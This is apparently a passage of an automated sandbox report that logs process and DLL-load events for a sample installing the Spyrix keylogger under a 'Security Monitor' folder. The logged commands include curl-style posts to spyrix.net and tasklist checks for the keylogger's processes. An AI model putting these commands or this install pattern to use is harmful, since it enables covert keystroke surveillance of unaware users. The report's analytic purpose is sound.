Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
